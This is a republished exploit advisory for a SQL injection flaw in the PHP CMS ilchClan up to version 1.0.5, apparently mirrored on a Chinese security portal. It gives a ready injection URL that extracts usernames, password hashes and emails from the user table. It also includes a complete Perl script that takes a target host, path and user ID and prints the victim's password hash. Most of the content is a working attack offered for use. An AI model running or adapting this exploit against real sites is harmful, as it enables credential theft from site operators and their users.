首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ilchClan <= 1.0.5 (cid) SQL Injection Vulnerability & Exploit
来源:vfocus.net 作者:Laster 发布时间:2010-04-07  
=============================================================
ilchClan <= 1.0.5 (cid) SQL Injection Vulnerability & Exploit
=============================================================

----------------------------Information------------------------------------------------
+Name : ilchClan <= 1.0.5 SQL Injection Vulnerability & Exploit
+Autor : Easy Laster
+Date   : 05.04.2010
+Script  : ilchClan <= 1.0.5
+Price : for free
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/ilchClan105/?m=downloads&cid=

+Exploitable   : http://www.site.com/ilchClan105/?m=downloads&cid=1+and+1=0+union+select
+1,concat(name,0x3a,pass,0x3a,email)+from+ilchclan_user+where+id=1--


-----------------------------------------------------------------------------------------

#Exploit


#!usr\bin\perl
#
#
##################################################
# Modules                                        #
#------------------------------------------------#   
use strict;               # Better coding.       #
use warnings;             # Useful warnings.     #
use LWP::Simple;          # procedureal interface#
##################################################
print "
##################################################
#            4004-Security-Project               #
##################################################
#         ilchClan <= 1.0.5 SQL Injection        #
#                     Exploit                    #
#          Using Host+Path+Userid+prefix         #
#          demo.de /ilchclan/ 1 ilchClan         #
#                   Easy Laster                  #
##################################################
\a\n";
my($host,$path,$userid,$request);
my($first,$block,$error,$dir,$prefix);
$block = "
##################################################\n";
$error = "Exploit failed";
  print "$block";
    print q(Target demo.de->);
    chomp($host =<STDIN>);
    if ($host eq""){
    die "$error\a\n"};
    print "$block";
          print q(Path /path/ ->);
          chomp($path =<STDIN>);
          if ($path eq""){
          die "$error\a\n";}
                 print "$block";
                 print q(userid->);
                  chomp($userid =<STDIN>);
                      if ($userid eq""){
                      die "$error\a\n";}
                      print "$block";
                            print q(prefix ilchClan ->);
                            chomp($prefix =<STDIN>);
                            if ($prefix eq""){
                            die "$error\a\n";}
                            print "$block";
                            $dir = "?m=downloads&cid=";
                            print "<~> Exploiting...\n";
                          $host = "http://".$host.$path.$dir;
                          print "<~> Connecting...\n";
                          $request = get($host."1+and+1=0+union+select+1,concat(0x23,0x23,0x23,0x23,0x23,pass)+from+".$prefix."_user+where+id=".$userid."--");
                       $first = rindex($request,"#####");
                       if ($first != -1)
                       {
               print "<~> Exploiting...\n";
               print "$block\n";
         $request = substr($request, $first+5, 32);
         print "<~> Hash = $request\n\r\n\a";
       }
       else
     {
   print "<~> $error";
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MyVideoConverter v2.15 Local D
·Internet Explorer Tabular Data
·MP3 Wav Editor v3.80 .mp3 Loca
·Local Privilege Escalation in
·Portable AVS DVD Authoring v1.
·Internal Information Disclosur
·Microsoft Office ( 2010 beta )
·Denial of Service in McAfee Em
·Foxit Reader <= 3.2.1.0401 Den
·Local Glibc shared library (.s
·Jzip v1.3 (.zip) Unicode buffe
·Anyzip (.zip) v1.1 0day Poc (S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved